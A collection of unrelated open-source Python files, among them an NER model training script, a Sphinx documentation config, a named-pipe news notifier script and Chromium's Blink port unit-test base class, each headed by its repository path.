self.cls = BiFPNClassifier(
bifpn_out_channels,
num_anchors,
num_classes + int(has_background),
num_layers,
activation,
)
self.device = device
self.pretrained_path = pretrained_path
def forward(self, features):
return self.cls(features), self.reg(features)
|
docs/conf.py
|
richardsheridan/anyio
| 749 |
64956
|
#!/usr/bin/env python3
import pkg_resources
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx_autodoc_typehints'
]
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'AnyIO'
author = '<NAME>'
copyright = '2018, ' + author
v = pkg_resources.get_distribution('anyio').parsed_version
version = v.base_version
release = v.public
language = None
exclude_patterns = ['_build']
pygments_style = 'sphinx'
autodoc_default_options = {
'members': True,
'show-inheritance': True
}
todo_include_todos = False
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
htmlhelp_basename = 'anyiodoc'
intersphinx_mapping = {'python': ('https://docs.python.org/3/', None)}
|
doc/source/plots/spherharm42.py
|
dimpase/mpmath
| 625 |
64973
|
<reponame>dimpase/mpmath<filename>doc/source/plots/spherharm42.py
# Real part of spherical harmonic Y_(4,2)(theta,phi)
def Y(l,m):
def g(theta,phi):
R = abs(fp.re(fp.spherharm(l,m,theta,phi)))
x = R*fp.cos(phi)*fp.sin(theta)
y = R*fp.sin(phi)*fp.sin(theta)
z = R*fp.cos(theta)
return [x,y,z]
return g
fp.splot(Y(4,2), [0,fp.pi], [0,2*fp.pi], points=300)
|
main.py
|
RowitZou/Lexicon-nn
| 134 |
64975
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
# @Author: <NAME>
# @Last Modified by: <NAME>, Contact: <EMAIL>
import time
import sys
import argparse
import random
import torch
import gc
import pickle
import os
import torch.autograd as autograd
import torch.optim as optim
import numpy as np
from utils.metric import get_ner_fmeasure
from model.LGN import Graph
from utils.data import Data
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def lr_decay(optimizer, epoch, decay_rate, init_lr):
lr = init_lr * ((1-decay_rate)**epoch)
print( " Learning rate is setted as:", lr)
for param_group in optimizer.param_groups:
if param_group['name'] == 'aggr':
param_group['lr'] = lr * 2.
else:
param_group['lr'] = lr
return optimizer
def data_initialization(data, word_file, train_file, dev_file, test_file):
data.build_word_file(word_file)
if train_file:
data.build_alphabet(train_file)
data.build_word_alphabet(train_file)
if dev_file:
data.build_alphabet(dev_file)
data.build_word_alphabet(dev_file)
if test_file:
data.build_alphabet(test_file)
data.build_word_alphabet(test_file)
return data
def predict_check(pred_variable, gold_variable, mask_variable):
pred = pred_variable.cpu().data.numpy()
gold = gold_variable.cpu().data.numpy()
mask = mask_variable.cpu().data.numpy()
overlaped = (pred == gold)
right_token = np.sum(overlaped * mask)
total_token = mask.sum()
return right_token, total_token
def recover_label(pred_variable, gold_variable, mask_variable, label_alphabet):
batch_size = gold_variable.size(0)
seq_len = gold_variable.size(1)
mask = mask_variable.cpu().data.numpy()
pred_tag = pred_variable.cpu().data.numpy()
gold_tag = gold_variable.cpu().data.numpy()
pred_label = []
gold_label = []
for idx in range(batch_size):
pred = [label_alphabet.get_instance(pred_tag[idx][idy]) for idy in range(seq_len) if mask[idx][idy] != 0]
gold = [label_alphabet.get_instance(gold_tag[idx][idy]) for idy in range(seq_len) if mask[idx][idy] != 0]
assert(len(pred)==len(gold))
pred_label.append(pred)
gold_label.append(gold)
return pred_label, gold_label
def print_args(args):
print("CONFIG SUMMARY:")
print(" Batch size: %s" % (args.batch_size))
print(" If use GPU: %s" % (args.use_gpu))
print(" If use CRF: %s" % (args.use_crf))
print(" Epoch number: %s" % (args.num_epoch))
print(" Learning rate: %s" % (args.lr))
print(" L2 normalization rate: %s" % (args.weight_decay))
print(" If use edge embedding: %s" % (args.use_edge))
print(" If use global node: %s" % (args.use_global))
print(" Bidirectional digraph: %s" % (args.bidirectional))
print(" Update step number: %s" % (args.iters))
print(" Attention dropout rate: %s" % (args.tf_drop_rate))
print(" Embedding dropout rate: %s" % (args.emb_drop_rate))
print(" Hidden state dimension: %s" % (args.hidden_dim))
print(" Learning rate decay ratio: %s" % (args.lr_decay))
print(" Aggregation module dropout rate: %s" % (args.cell_drop_rate))
print(" Head number of attention: %s" % (args.num_head))
print(" Head dimension of attention: %s" % (args.head_dim))
print("CONFIG SUMMARY END.")
sys.stdout.flush()
def evaluate(data, args, model, name):
if name == "train":
instances = data.train_Ids
elif name == "dev":
instances = data.dev_Ids
elif name == 'test':
instances = data.test_Ids
elif name == 'raw':
instances = data.raw_Ids
else:
print("Error: wrong evaluate name,", name)
exit(0)
pred_results = []
gold_results = []
# set model in eval model
model.eval()
batch_size = args.batch_size
start_time = time.time()
train_num = len(instances)
total_batch = train_num // batch_size + 1
for batch_id in range(total_batch):
start = batch_id*batch_size
end = (batch_id+1)*batch_size
if end > train_num:
end = train_num
instance = instances[start:end]
if not instance:
continue
word_list, batch_char, batch_label, mask = batchify_with_label(instance, args.use_gpu)
_, tag_seq = model(word_list, batch_char, mask)
pred_label, gold_label = recover_label(tag_seq, batch_label, mask, data.label_alphabet)
pred_results += pred_label
gold_results += gold_label
decode_time = time.time() - start_time
speed = len(instances) / decode_time
acc, p, r, f = get_ner_fmeasure(gold_results, pred_results)
return speed, acc, p, r, f, pred_results
def batchify_with_label(input_batch_list, gpu):
batch_size = len(input_batch_list)
chars = [sent[0] for sent in input_batch_list]
words = [sent[1] for sent in input_batch_list]
labels = [sent[2] for sent in input_batch_list]
sent_lengths = torch.LongTensor(list(map(len, chars)))
max_sent_len = sent_lengths.max()
char_seq_tensor = autograd.Variable(torch.zeros((batch_size, max_sent_len))).long()
label_seq_tensor = autograd.Variable(torch.zeros((batch_size, max_sent_len))).long()
mask = autograd.Variable(torch.zeros((batch_size, max_sent_len))).byte()
for idx, (seq, label, seq_len) in enumerate(zip(chars, labels, sent_lengths)):
char_seq_tensor[idx, :seq_len] = torch.LongTensor(seq)
label_seq_tensor[idx, :seq_len] = torch.LongTensor(label)
mask[idx, :seq_len] = torch.Tensor([1] * int(seq_len))
if gpu:
char_seq_tensor = char_seq_tensor.cuda()
label_seq_tensor = label_seq_tensor.cuda()
mask = mask.cuda()
return words, char_seq_tensor, label_seq_tensor, mask
def train(data, args, saved_model_path):
print( "Training model...")
model = Graph(data, args)
if args.use_gpu:
model = model.cuda()
print('# generated parameters:', sum(param.numel() for param in model.parameters()))
print( "Finished built model.")
best_dev_epoch = 0
best_dev_f = -1
best_dev_p = -1
best_dev_r = -1
best_test_f = -1
best_test_p = -1
best_test_r = -1
# Initialize the optimizer
aggr_module_params = []
other_module_params = []
for m_name in model._modules:
m = model._modules[m_name]
if isinstance(m, torch.nn.ModuleList):
for p in m.parameters():
if p.requires_grad:
aggr_module_params.append(p)
else:
for p in m.parameters():
if p.requires_grad:
other_module_params.append(p)
optimizer = optim.Adam([
{"params": (aggr_module_params), "name": "aggr"},
{"params": (other_module_params), "name": "other"}
],
lr=args.lr,
weight_decay=args.weight_decay
)
for idx in range(args.num_epoch):
epoch_start = time.time()
temp_start = epoch_start
print(("Epoch: %s/%s" %(idx, args.num_epoch)))
optimizer = lr_decay(optimizer, idx, args.lr_decay, args.lr)
sample_loss = 0
batch_loss = 0
total_loss = 0
right_token = 0
whole_token = 0
random.shuffle(data.train_Ids)
# set model in train model
model.train()
model.zero_grad()
batch_size = args.batch_size
train_num = len(data.train_Ids)
total_batch = train_num // batch_size + 1
for batch_id in range(total_batch):
# Get one batch-sized instance
start = batch_id * batch_size
end = (batch_id + 1) * batch_size
if end > train_num:
end = train_num
instance = data.train_Ids[start:end]
if not instance:
continue
word_list, batch_char, batch_label, mask = batchify_with_label(instance, args.use_gpu)
loss, tag_seq = model(word_list, batch_char, mask, batch_label)
right, whole = predict_check(tag_seq, batch_label, mask)
right_token += right
whole_token += whole
sample_loss += loss.data
total_loss += loss.data
batch_loss += loss
if end % 500 == 0:
temp_time = time.time()
temp_cost = temp_time - temp_start
temp_start = temp_time
print((" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f" %
(end, temp_cost, sample_loss, right_token, whole_token, (right_token+0.)/whole_token)))
sys.stdout.flush()
sample_loss = 0
if end % args.batch_size == 0:
batch_loss.backward()
optimizer.step()
model.zero_grad()
batch_loss = 0
temp_time = time.time()
temp_cost = temp_time - temp_start
print((" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f" %
(end, temp_cost, sample_loss, right_token, whole_token, (right_token+0.)/whole_token)))
epoch_finish = time.time()
epoch_cost = epoch_finish - epoch_start
print(("Epoch: %s training finished. Time: %.2fs, speed: %.2fst/s, total loss: %s" %
(idx, epoch_cost, train_num/epoch_cost, total_loss)))
# dev
speed, acc, dev_p, dev_r, dev_f, _ = evaluate(data, args, model, "dev")
dev_finish = time.time()
dev_cost = dev_finish - epoch_finish
print(("Dev: time: %.2fs, speed: %.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f" %
(dev_cost, speed, acc, dev_p, dev_r, dev_f)))
# test
speed, acc, test_p, test_r, test_f, _ = evaluate(data, args, model, "test")
test_finish = time.time()
test_cost = test_finish - dev_finish
print(("Test: time: %.2fs, speed: %.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f" %
(test_cost, speed, acc, test_p, test_r, test_f)))
if dev_f > best_dev_f:
print("Exceed previous best f score: %.4f" % best_dev_f)
torch.save(model.state_dict(), saved_model_path + "_best")
best_dev_p = dev_p
best_dev_r = dev_r
best_dev_f = dev_f
best_dev_epoch = idx + 1
best_test_p = test_p
best_test_r = test_r
best_test_f = test_f
model_idx_path = saved_model_path + "_" + str(idx)
torch.save(model.state_dict(), model_idx_path)
with open(saved_model_path + "_result.txt", "a") as file:
file.write(model_idx_path + '\n')
file.write("Dev score: %.4f, r: %.4f, f: %.4f\n" % (dev_p, dev_r, dev_f))
file.write("Test score: %.4f, r: %.4f, f: %.4f\n\n" % (test_p, test_r, test_f))
file.close()
print("Best dev epoch: %d" % best_dev_epoch)
print("Best dev score: p: %.4f, r: %.4f, f: %.4f" % (best_dev_p, best_dev_r, best_dev_f))
print("Best test score: p: %.4f, r: %.4f, f: %.4f" % (best_test_p, best_test_r, best_test_f))
gc.collect()
with open(saved_model_path + "_result.txt", "a") as file:
file.write("Best epoch: %d" % best_dev_epoch + '\n')
file.write("Best Dev score: %.4f, r: %.4f, f: %.4f\n" % (best_dev_p, best_dev_r, best_dev_f))
file.write("Test score: %.4f, r: %.4f, f: %.4f\n\n" % (best_test_p, best_test_r, best_test_f))
file.close()
with open(saved_model_path + "_best_HP.config", "wb") as file:
pickle.dump(args, file)
def load_model_decode(model_dir, data, args, name):
model_dir = model_dir + "_best"
print("Load Model from file: ", model_dir)
model = Graph(data, args)
model.load_state_dict(torch.load(model_dir))
# load model need consider if the model trained in GPU and load in CPU, or vice versa
if args.use_gpu:
model = model.cuda()
print(("Decode %s data ..." % name))
start_time = time.time()
speed, acc, p, r, f, pred_results = evaluate(data, args, model, name)
end_time = time.time()
time_cost = end_time - start_time
print(("%s: time:%.2fs, speed:%.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f" %
(name, time_cost, speed, acc, p, r, f)))
return pred_results
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--status', choices=['train', 'test', 'decode'], help='Function status.', default='train')
parser.add_argument('--use_gpu', type=str2bool, default=True)
parser.add_argument('--train', help='Training set.', default='data/onto4ner.cn/train.char.bmes')
parser.add_argument('--dev', help='Developing set.', default='data/onto4ner.cn/dev.char.bmes')
parser.add_argument('--test', help='Testing set.', default='data/onto4ner.cn/test.char.bmes')
parser.add_argument('--raw', help='Raw file for decoding.')
parser.add_argument('--output', help='Output results for decoding.')
parser.add_argument('--saved_set', help='Path of saved data set.', default='data/onto4ner.cn/saved.dset')
parser.add_argument('--saved_model', help='Path of saved model.', default="saved_model/model_onto4ner")
parser.add_argument('--char_emb', help='Path of character embedding file.', default="data/gigaword_chn.all.a2b.uni.ite50.vec")
parser.add_argument('--word_emb', help='Path of word embedding file.', default="data/ctb.50d.vec")
parser.add_argument('--use_crf', type=str2bool, default=True)
parser.add_argument('--use_edge', type=str2bool, default=True, help='If use lexicon embeddings (edge embeddings).')
parser.add_argument('--use_global', type=str2bool, default=True, help='If use the global node.')
parser.add_argument('--bidirectional', type=str2bool, default=True, help='If use bidirectional digraph.')
parser.add_argument('--seed', help='Random seed', default=1023, type=int)
parser.add_argument('--batch_size', help='Batch size.', default=1, type=int)
parser.add_argument('--num_epoch',default=100, type=int, help="Epoch number.")
parser.add_argument('--iters', default=4, type=int, help='The number of Graph iterations.')
parser.add_argument('--hidden_dim', default=50, type=int, help='Hidden state size.')
parser.add_argument('--num_head', default=10, type=int, help='Number of transformer head.')
parser.add_argument('--head_dim', default=20, type=int, help='Head dimension of transformer.')
parser.add_argument('--tf_drop_rate', default=0.1, type=float, help='Transformer dropout rate.')
parser.add_argument('--emb_drop_rate', default=0.5, type=float, help='Embedding dropout rate.')
parser.add_argument('--cell_drop_rate', default=0.2, type=float, help='Aggregation module dropout rate.')
parser.add_argument('--word_alphabet_size', type=int, help='Word alphabet size.')
parser.add_argument('--char_alphabet_size', type=int, help='Char alphabet size.')
parser.add_argument('--label_alphabet_size', type=int, help='Label alphabet size.')
parser.add_argument('--char_dim', type=int, help='Char embedding size.')
parser.add_argument('--word_dim', type=int, help='Word embedding size.')
parser.add_argument('--lr', type=float, default=2e-05)
parser.add_argument('--lr_decay', type=float, default=0)
parser.add_argument('--weight_decay', type=float, default=0)
args = parser.parse_args()
status = args.status.lower()
seed_num = args.seed
random.seed(seed_num)
torch.manual_seed(seed_num)
np.random.seed(seed_num)
train_file = args.train
dev_file = args.dev
test_file = args.test
raw_file = args.raw
output_file = args.output
saved_set_path = args.saved_set
saved_model_path = args.saved_model
char_file = args.char_emb
word_file = args.word_emb
if status == 'train':
if os.path.exists(saved_set_path):
print('Loading saved data set...')
with open(saved_set_path, 'rb') as f:
data = pickle.load(f)
else:
data = Data()
data_initialization(data, word_file, train_file, dev_file, test_file)
data.generate_instance_with_words(train_file, 'train')
data.generate_instance_with_words(dev_file, 'dev')
data.generate_instance_with_words(test_file, 'test')
data.build_char_pretrain_emb(char_file)
data.build_word_pretrain_emb(word_file)
if saved_set_path is not None:
print('Dumping data...')
with open(saved_set_path, 'wb') as f:
pickle.dump(data, f)
data.show_data_summary()
args.word_alphabet_size = data.word_alphabet.size()
args.char_alphabet_size = data.char_alphabet.size()
args.label_alphabet_size = data.label_alphabet.size()
args.char_dim = data.char_emb_dim
args.word_dim = data.word_emb_dim
print_args(args)
train(data, args, saved_model_path)
elif status == 'test':
assert not (test_file is None)
if os.path.exists(saved_set_path):
print('Loading saved data set...')
with open(saved_set_path, 'rb') as f:
data = pickle.load(f)
else:
print("Cannot find saved data set: ", saved_set_path)
exit(0)
data.generate_instance_with_words(test_file, 'test')
with open(saved_model_path + "_best_HP.config", "rb") as f:
args = pickle.load(f)
data.show_data_summary()
print_args(args)
load_model_decode(saved_model_path, data, args, "test")
elif status == 'decode':
assert not (raw_file is None or output_file is None)
if os.path.exists(saved_set_path):
print('Loading saved data set...')
with open(saved_set_path, 'rb') as f:
data = pickle.load(f)
else:
print("Cannot find saved data set: ", saved_set_path)
exit(0)
data.generate_instance_with_words(raw_file, 'raw')
with open(saved_model_path + "_best_HP.config", "rb") as f:
args = pickle.load(f)
data.show_data_summary()
print_args(args)
decode_results = load_model_decode(saved_model_path, data, args, "raw")
data.write_decoded_results(output_file, decode_results, 'raw')
else:
print("Invalid argument! Please use valid arguments! (train/test/decode)")
|
scripts/hello.py
|
LukeB42/Emissary
| 193 |
64992
|
# _*_ coding: utf-8 _*_
#
# This script creates a named pipe (if it doesn't exist)
# and writes the feed name, article title and url to it
# whenever an article is saved to the database.
#
# This is useful for composing systems that constantly read
# the FIFO and do things like emit the data to IRC channels.
#
# You could, for instance, perform fuzzy pattern matching and be
# notified when certain keywords are in the news.
#
# Transmission to a natural language processing/translation service
# can also be done in a script or by reading a FIFO like the one here.
#
# Whether you use this system to profit, perform intelligence analysis
# or inform your next vote is hopefully up to you!
#
# <NAME>, 2015
# MIT License
# Many big thanks to God, lord of universes.
fifo = "/tmp/emissary.pipe"
import os, stat
if not os.path.exists(fifo):
try:
os.mkfifo(fifo)
except Exception, e:
cache['app'].log("Error creating %s: %s" % (fifo, e.message))
# Emissary always executes scripts with an article and its feed in the namespace.
# There is also a dictionary named cache, containing the app object.
# Random aside but through the app object you can access the logging interface and the feed manager.
try:
# READER BEWARE: Use non-blocking IO or you won't be storing owt.
fd = os.open(fifo, os.O_CREAT | os.O_WRONLY | os.O_NONBLOCK)
os.write(fd, "%s: %s\n%s\n" % (feed.name, article.title, article.url))
os.close(fd)
del fd
except Exception, e: # Usually due to there not being a reader fd known to the kernel.
pass
del os, stat, fifo
|
third_party/blink/tools/blinkpy/web_tests/port/port_testcase.py
|
zealoussnow/chromium
| 14,668 |
64997
|
<gh_stars>1000+
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit testing base class for Port implementations."""
import collections
import optparse
from blinkpy.common import exit_codes
from blinkpy.common.system.executive import ScriptError
from blinkpy.common.system.executive_mock import MockExecutive
from blinkpy.common.system.log_testing import LoggingTestCase
from blinkpy.common.system.system_host import SystemHost
from blinkpy.common.system.system_host_mock import MockSystemHost
from blinkpy.web_tests.port.base import Port
class FakePrinter(object):
def write_update(self, msg):
pass
def write_throttled_update(self, msg):
pass
class PortTestCase(LoggingTestCase):
"""Tests that all Port implementations must pass."""
# Some tests in this class test or override protected methods
# pylint: disable=protected-access
HTTP_PORTS = (8000, 8080, 8443)
WEBSOCKET_PORTS = (8880, )
# Subclasses override this to point to their Port subclass.
os_name = None
os_version = None
port_maker = Port
port_name = None
full_port_name = None
def make_port(self,
host=None,
port_name=None,
options=None,
os_name=None,
os_version=None,
**kwargs):
host = host or MockSystemHost(
os_name=(os_name or self.os_name),
os_version=(os_version or self.os_version))
options = options or optparse.Values({
'configuration': 'Release',
'use_xvfb': True
})
port_name = port_name or self.port_name
port_name = self.port_maker.determine_full_port_name(
host, options, port_name)
return self.port_maker(host, port_name, options=options, **kwargs)
def test_check_build(self):
port = self.make_port()
# Here we override methods to make it appear as though the build
# requirements are all met and the driver is found.
port._check_file_exists = lambda path, desc: True
if port._dump_reader:
port._dump_reader.check_is_functional = lambda: True
port._options.build = True
port._check_driver_build_up_to_date = lambda config: True
port.check_httpd = lambda: True
self.assertEqual(
port.check_build(needs_http=True, printer=FakePrinter()),
exit_codes.OK_EXIT_STATUS)
logs = ''.join(self.logMessages())
self.assertNotIn('build requirements', logs)
# And here, after changing it so that the driver binary is not found,
# we get an error exit status and message about build requirements.
port._check_file_exists = lambda path, desc: False
self.assertEqual(
port.check_build(needs_http=True, printer=FakePrinter()),
exit_codes.UNEXPECTED_ERROR_EXIT_STATUS)
logs = ''.join(self.logMessages())
self.assertIn('build requirements', logs)
def test_default_batch_size(self):
port = self.make_port()
# Test that we set a finite batch size for sanitizer builds.
port._options.enable_sanitizer = True
sanitized_batch_size = port.default_batch_size()
self.assertIsNotNone(sanitized_batch_size)
def test_default_child_processes(self):
port = self.make_port()
num_workers = port.default_child_processes()
self.assertGreaterEqual(num_workers, 1)
def test_default_max_locked_shards(self):
port = self.make_port()
port.default_child_processes = lambda: 16
self.assertEqual(port.default_max_locked_shards(), 4)
port.default_child_processes = lambda: 2
self.assertEqual(port.default_max_locked_shards(), 1)
def test_default_timeout_ms(self):
self.assertEqual(self.make_port().timeout_ms(), 6000)
def test_timeout_ms_release(self):
self.assertEqual(
self.make_port(options=optparse.Values(
{'configuration': 'Release'})).timeout_ms(),
self.make_port().timeout_ms())
def test_timeout_ms_debug(self):
self.assertEqual(
self.make_port(options=optparse.Values({'configuration': 'Debug'
})).timeout_ms(),
5 * self.make_port().timeout_ms())
def make_dcheck_port(self, options):
host = MockSystemHost(os_name=self.os_name, os_version=self.os_version)
host.filesystem.write_text_file(
self.make_port(host)._build_path('args.gn'),
'is_debug=false\ndcheck_always_on = true # comment\n')
port = self.make_port(host, options=options)
return port
def test_timeout_ms_with_dcheck(self):
default_timeout_ms = self.make_port().timeout_ms()
self.assertEqual(
self.make_dcheck_port(options=optparse.Values(
{'configuration': 'Release'})).timeout_ms(),
2 * default_timeout_ms)
self.assertEqual(
self.make_dcheck_port(options=optparse.Values(
{'configuration': 'Debug'})).timeout_ms(),
5 * default_timeout_ms)
def test_driver_cmd_line(self):
port = self.make_port()
self.assertTrue(len(port.driver_cmd_line()))
options = optparse.Values(
dict(additional_driver_flag=['--foo=bar', '--foo=baz']))
port = self.make_port(options=options)
cmd_line = port.driver_cmd_line()
self.assertTrue('--foo=bar' in cmd_line)
self.assertTrue('--foo=baz' in cmd_line)
def test_diff_image__missing_both(self):
port = self.make_port()
self.assertEqual(port.diff_image(None, None), (None, None))
self.assertEqual(port.diff_image(None, ''), (None, None))
self.assertEqual(port.diff_image('', None), (None, None))
self.assertEqual(port.diff_image('', ''), (None, None))
def test_diff_image__missing_actual(self):
port = self.make_port()
self.assertEqual(port.diff_image(None, 'foo'), ('foo', None))
self.assertEqual(port.diff_image('', 'foo'), ('foo', None))
def test_diff_image__missing_expected(self):
port = self.make_port()
self.assertEqual(port.diff_image('foo', None), ('foo', None))
self.assertEqual(port.diff_image('foo', ''), ('foo', None))
def test_diff_image(self):
def _path_to_image_diff():
return '/path/to/image_diff'
port = self.make_port()
port._path_to_image_diff = _path_to_image_diff
mock_image_diff = 'MOCK Image Diff'
def mock_run_command(args):
port.host.filesystem.write_binary_file(args[4], mock_image_diff)
raise ScriptError(exit_code=1)
# Images are different.
port._executive = MockExecutive(run_command_fn=mock_run_command) # pylint: disable=protected-access
self.assertEqual(mock_image_diff,
port.diff_image('EXPECTED', 'ACTUAL')[0])
# Images are the same.
port._executive = MockExecutive(exit_code=0) # pylint: disable=protected-access
self.assertEqual(None, port.diff_image('EXPECTED', 'ACTUAL')[0])
# There was some error running image_diff.
port._executive = MockExecutive(exit_code=2) # pylint: disable=protected-access
exception_raised = False
try:
port.diff_image('EXPECTED', 'ACTUAL')
except ValueError:
exception_raised = True
self.assertFalse(exception_raised)
def test_diff_image_crashed(self):
port = self.make_port()
port._executive = MockExecutive(should_throw=True, exit_code=2) # pylint: disable=protected-access
self.assertEqual(
port.diff_image('EXPECTED', 'ACTUAL'),
(None,
'Image diff returned an exit code of 2. See http://crbug.com/278596'
))
def test_test_configuration(self):
port = self.make_port()
self.assertTrue(port.test_configuration())
def test_get_crash_log_all_none(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log(
None, None, None, None, newer_than=None)
self.assertIsNone(stderr)
self.assertEqual(
details, b'crash log for <unknown process name> (pid <unknown>):\n'
b'STDOUT: <empty>\n'
b'STDERR: <empty>\n')
self.assertIsNone(crash_site)
def test_get_crash_log_simple(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log(
'foo',
1234,
b'out bar\nout baz',
b'err bar\nerr baz\n',
newer_than=None)
self.assertEqual(stderr, b'err bar\nerr baz\n')
self.assertEqual(
details, b'crash log for foo (pid 1234):\n'
b'STDOUT: out bar\n'
b'STDOUT: out baz\n'
b'STDERR: err bar\n'
b'STDERR: err baz\n')
self.assertIsNone(crash_site)
def test_get_crash_log_non_ascii(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log('foo',
1234,
b'foo\xa6bar',
b'foo\xa6bar',
newer_than=None)
self.assertEqual(stderr, b'foo\xa6bar')
self.assertEqual(
details.decode('utf8', 'replace'),
u'crash log for foo (pid 1234):\n'
u'STDOUT: foo\ufffdbar\n'
u'STDERR: foo\ufffdbar\n')
self.assertIsNone(crash_site)
def test_get_crash_log_newer_than(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log('foo',
1234,
b'foo\xa6bar',
b'foo\xa6bar',
newer_than=1.0)
self.assertEqual(stderr, b'foo\xa6bar')
self.assertEqual(
details.decode('utf8', 'replace'),
u'crash log for foo (pid 1234):\n'
u'STDOUT: foo\ufffdbar\n'
u'STDERR: foo\ufffdbar\n')
self.assertIsNone(crash_site)
def test_get_crash_log_crash_site(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log(
'foo',
1234,
b'out bar',
b'[1:2:3:4:FATAL:example.cc(567)] Check failed.',
newer_than=None)
self.assertEqual(stderr,
b'[1:2:3:4:FATAL:example.cc(567)] Check failed.')
self.assertEqual(
details, b'crash log for foo (pid 1234):\n'
b'STDOUT: out bar\n'
b'STDERR: [1:2:3:4:FATAL:example.cc(567)] Check failed.\n')
self.assertEqual(crash_site, 'example.cc(567)')
def test_default_expectations_files(self):
port = self.make_port()
self.assertEqual(list(port.default_expectations_files()), [
port.path_to_generic_test_expectations_file(),
port.path_to_webdriver_expectations_file(),
port.host.filesystem.join(port.web_tests_dir(), 'NeverFixTests'),
port.host.filesystem.join(port.web_tests_dir(),
'StaleTestExpectations'),
port.host.filesystem.join(port.web_tests_dir(), 'SlowTests'),
])
def test_default_expectations_ordering(self):
port = self.make_port()
for path in port.default_expectations_files():
port.host.filesystem.write_text_file(path, '')
ordered_dict = port.expectations_dict()
self.assertEqual(port.path_to_generic_test_expectations_file(),
list(ordered_dict)[0])
options = optparse.Values(
dict(additional_expectations=['/tmp/foo', '/tmp/bar']))
port = self.make_port(options=options)
for path in port.default_expectations_files():
port.host.filesystem.write_text_file(path, '')
port.host.filesystem.write_text_file('/tmp/foo', 'foo')
port.host.filesystem.write_text_file('/tmp/bar', 'bar')
ordered_dict = port.expectations_dict()
self.assertEqual(
list(ordered_dict)[-2:], options.additional_expectations)
self.assertEqual(list(ordered_dict.values())[-2:], ['foo', 'bar'])
def test_used_expectations_files(self):
options = optparse.Values({
'additional_expectations': ['/tmp/foo'],
'additional_driver_flag': ['flag-specific']
})
port = self.make_port(options=options)
self.assertEqual(list(port.used_expectations_files()), [
port.path_to_generic_test_expectations_file(),
port.path_to_webdriver_expectations_file(),
port.host.filesystem.join(port.web_tests_dir(), 'NeverFixTests'),
port.host.filesystem.join(port.web_tests_dir(),
'StaleTestExpectations'),
port.host.filesystem.join(port.web_tests_dir(), 'SlowTests'),
port.host.filesystem.join(port.web_tests_dir(), 'FlagExpectations',
'flag-specific'),
'/tmp/foo',
])
def test_path_to_apache_config_file(self):
# Specific behavior may vary by port, so unit test sub-classes may override this.
port = self.make_port()
port.host.environ[
'WEBKIT_HTTP_SERVER_CONF_PATH'] = '/path/to/httpd.conf'
with self.assertRaises(IOError):
port.path_to_apache_config_file()
port.host.filesystem.write_text_file('/existing/httpd.conf',
'Hello, world!')
port.host.environ[
'WEBKIT_HTTP_SERVER_CONF_PATH'] = '/existing/httpd.conf'
self.assertEqual(port.path_to_apache_config_file(),
'/existing/httpd.conf')
# Mock out _apache_config_file_name_for_platform to avoid mocking platform info.
port._apache_config_file_name_for_platform = lambda: 'httpd.conf'
del port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']
self.assertEqual(
port.path_to_apache_config_file(),
port.host.filesystem.join(port.apache_config_directory(),
'httpd.conf'))
# Check that even if we mock out _apache_config_file_name, the environment variable takes precedence.
port.host.environ[
'WEBKIT_HTTP_SERVER_CONF_PATH'] = '/existing/httpd.conf'
self.assertEqual(port.path_to_apache_config_file(),
'/existing/httpd.conf')
def test_additional_platform_directory(self):
port = self.make_port(
options=optparse.Values(
dict(additional_platform_directory=['/tmp/foo'])))
self.assertEqual(port.baseline_search_path()[0], '/tmp/foo')
def test_virtual_test_suites(self):
# We test that we can load the real web_tests/VirtualTestSuites file properly, so we
# use a real SystemHost(). We don't care what virtual_test_suites() returns as long
# as it is iterable.
port = self.make_port(host=SystemHost(), port_name=self.full_port_name)
self.assertTrue(
isinstance(port.virtual_test_suites(), collections.Iterable))
|
videos/lagrange.py
|
ryu577/pyray
| 715 |
65015
|
import numpy as np
from pyray.shapes.twod.paraboloid import *
from pyray.shapes.twod.functional import *
from pyray.rotation import *
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
